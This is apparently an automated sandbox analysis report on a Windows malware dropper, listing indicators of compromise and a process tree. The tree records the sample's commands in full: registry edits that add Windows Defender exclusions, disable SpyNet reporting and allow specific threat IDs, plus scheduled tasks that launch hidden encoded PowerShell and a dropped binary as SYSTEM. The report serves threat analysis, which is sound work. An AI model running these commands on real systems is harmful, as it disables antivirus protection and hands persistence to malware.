pid Process 3696 schtasks.exe 4080 schtasks.exe 3116 schtasks.exe 4504 schtasks.exe 1964 schtasks.exe 2984 schtasks.exe 3372 schtasks.exe 1500 schtasks.exe 1216 schtasks.exe 2616 schtasks.exe 1924 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 1228 powershell.EXE 1228 powershell.EXE 2592 powershell.exe 2592 powershell.exe 4584 powershell.exe 4584 powershell.exe 1280 powershell.EXE 1280 powershell.EXE 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe 5000 pMAkVIP.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1228 powershell.EXE Token: SeDebugPrivilege 2592 powershell.exe Token: SeDebugPrivilege 4584 powershell.exe Token: SeDebugPrivilege 1280 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2628 wrote to memory of 1968 2628 8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff.exe 86 PID 2628 wrote to memory of 1968 2628 8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff.exe 86 PID 2628 wrote to memory of 1968 2628 8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff.exe 86 PID 1968 wrote to memory of 264 1968 Install.exe 87 PID 1968 wrote to memory of 264 1968 Install.exe 87 PID 1968 wrote to memory of 264 1968 Install.exe 87 PID 264 wrote to memory of 4364 264 Install.exe 90 PID 264 wrote to memory of 4364 264 Install.exe 90 PID 264 wrote to memory of 4364 264 Install.exe 90 PID 264 wrote to memory of 1088 264 Install.exe 92 PID 264 wrote to memory of 1088 264 Install.exe 92 PID 264 wrote to memory of 1088 264 Install.exe 92 PID 4364 wrote to memory of 5116 4364 forfiles.exe 94 PID 4364 wrote to memory of 5116 4364 forfiles.exe 94 PID 4364 wrote to memory of 5116 4364 forfiles.exe 94 PID 5116 wrote to memory of 4616 5116 cmd.exe 95 PID 5116 wrote to memory of 4616 5116 cmd.exe 95 PID 5116 wrote to memory of 4616 5116 cmd.exe 95 PID 1088 wrote to memory of 336 1088 forfiles.exe 96 PID 1088 wrote to memory of 336 1088 forfiles.exe 96 PID 1088 wrote to memory of 336 1088 forfiles.exe 96 PID 336 wrote to memory of 3448 336 cmd.exe 97 PID 336 wrote to memory of 3448 336 cmd.exe 97 PID 336 wrote to memory of 3448 336 cmd.exe 97 PID 5116 wrote to memory of 4252 5116 cmd.exe 98 PID 5116 wrote to memory of 4252 5116 cmd.exe 98 PID 5116 wrote to memory of 4252 5116 cmd.exe 98 PID 336 wrote to memory of 736 336 cmd.exe 99 PID 336 wrote to memory of 736 336 cmd.exe 99 PID 336 wrote to memory of 736 336 cmd.exe 99 PID 264 wrote to memory of 1964 264 Install.exe 103 PID 264 wrote to memory of 1964 264 Install.exe 103 PID 264 wrote to memory of 1964 264 Install.exe 103 PID 264 wrote to memory of 3068 264 Install.exe 105 PID 264 wrote to memory of 3068 264 Install.exe 105 PID 264 wrote to memory of 3068 264 Install.exe 105 PID 1228 wrote to memory of 1988 1228 powershell.EXE 109 PID 1228 wrote to memory of 1988 1228 powershell.EXE 109 PID 264 wrote to memory of 3968 264 Install.exe 117 PID 264 wrote to memory of 3968 264 Install.exe 117 PID 264 wrote to memory of 3968 264 Install.exe 117 PID 264 wrote to memory of 1216 264 Install.exe 119 PID 264 wrote to memory of 1216 264 Install.exe 119 PID 264 wrote to memory of 1216 264 Install.exe 119 PID 2456 wrote to memory of 2592 2456 OQHKJyH.exe 126 PID 2456 wrote to memory of 2592 2456 OQHKJyH.exe 126 PID 2456 wrote to memory of 2592 2456 OQHKJyH.exe 126 PID 2592 wrote to memory of 2236 2592 powershell.exe 128 PID 2592 wrote to memory of 2236 2592 powershell.exe 128 PID 2592 wrote to memory of 2236 2592 powershell.exe 128 PID 2592 wrote to memory of 3036 2592 powershell.exe 130 PID 2592 wrote to memory of 3036 2592 powershell.exe 130 PID 2592 wrote to memory of 3036 2592 powershell.exe 130 PID 2592 wrote to memory of 2076 2592 powershell.exe 131 PID 2592 wrote to memory of 2076 2592 powershell.exe 131 PID 2592 wrote to memory of 2076 2592 powershell.exe 131 PID 2592 wrote to memory of 1156 2592 powershell.exe 132 PID 2592 wrote to memory of 1156 2592 powershell.exe 132 PID 2592 wrote to memory of 1156 2592 powershell.exe 132 PID 2592 wrote to memory of 4116 2592 powershell.exe 133 PID 2592 wrote to memory of 4116 2592 powershell.exe 133 PID 2592 wrote to memory of 4116 2592 powershell.exe 133 PID 2592 wrote to memory of 2516 2592 powershell.exe 134 PID 2592 wrote to memory of 2516 2592 powershell.exe 134
Processes
-
C:\Users\Admin\AppData\Local\Temp\8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff.exe"C:\Users\Admin\AppData\Local\Temp\8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Users\Admin\AppData\Local\Temp\7zSA5E5.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Users\Admin\AppData\Local\Temp\7zSA846.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:264 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Indirect Command Execution
- Suspicious use of WriteProcessMemory
PID:4364 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5116 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
- System Location Discovery: System Language Discovery
PID:4616
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
- System Location Discovery: System Language Discovery
PID:4252
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Indirect Command Execution
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:336 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
- System Location Discovery: System Language Discovery
PID:3448
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
- System Location Discovery: System Language Discovery
PID:736
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gYmkdJFOK" /SC once /ST 14:36:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Scheduled Task/Job: Scheduled Task
PID:1964
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gYmkdJFOK"4⤵PID:3068
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gYmkdJFOK"4⤵
- System Location Discovery: System Language Discovery
PID:3968
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bKwcWZekAnYWEgmozo" /SC once /ST 15:25:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\OQHKJyH.exe\" q8 /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1216
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1228 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1988
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2096
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:5064
-
C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\OQHKJyH.exeC:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\OQHKJyH.exe q8 /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2236 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:4480
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:3036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2516
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:3700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:3968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:3612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:412
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:5036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:2884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3328
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:3124
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:4684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4264
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:3252
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:5116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:3396
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2500
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RqtPwFqMTiUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RqtPwFqMTiUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UBqYudvSNocU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UBqYudvSNocU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZUXSmeDRU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZUXSmeDRU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oXjeNNLqKAotC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oXjeNNLqKAotC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xonCRuklPFipnPeqKpR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xonCRuklPFipnPeqKpR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hrOORTLiECQfZJVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hrOORTLiECQfZJVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\YSrBLfWUtIHnuviW\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\YSrBLfWUtIHnuviW\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4584 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:396 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:3280
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4224
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:3304
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:643⤵PID:2256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:4704
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:4660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:3144
-
-
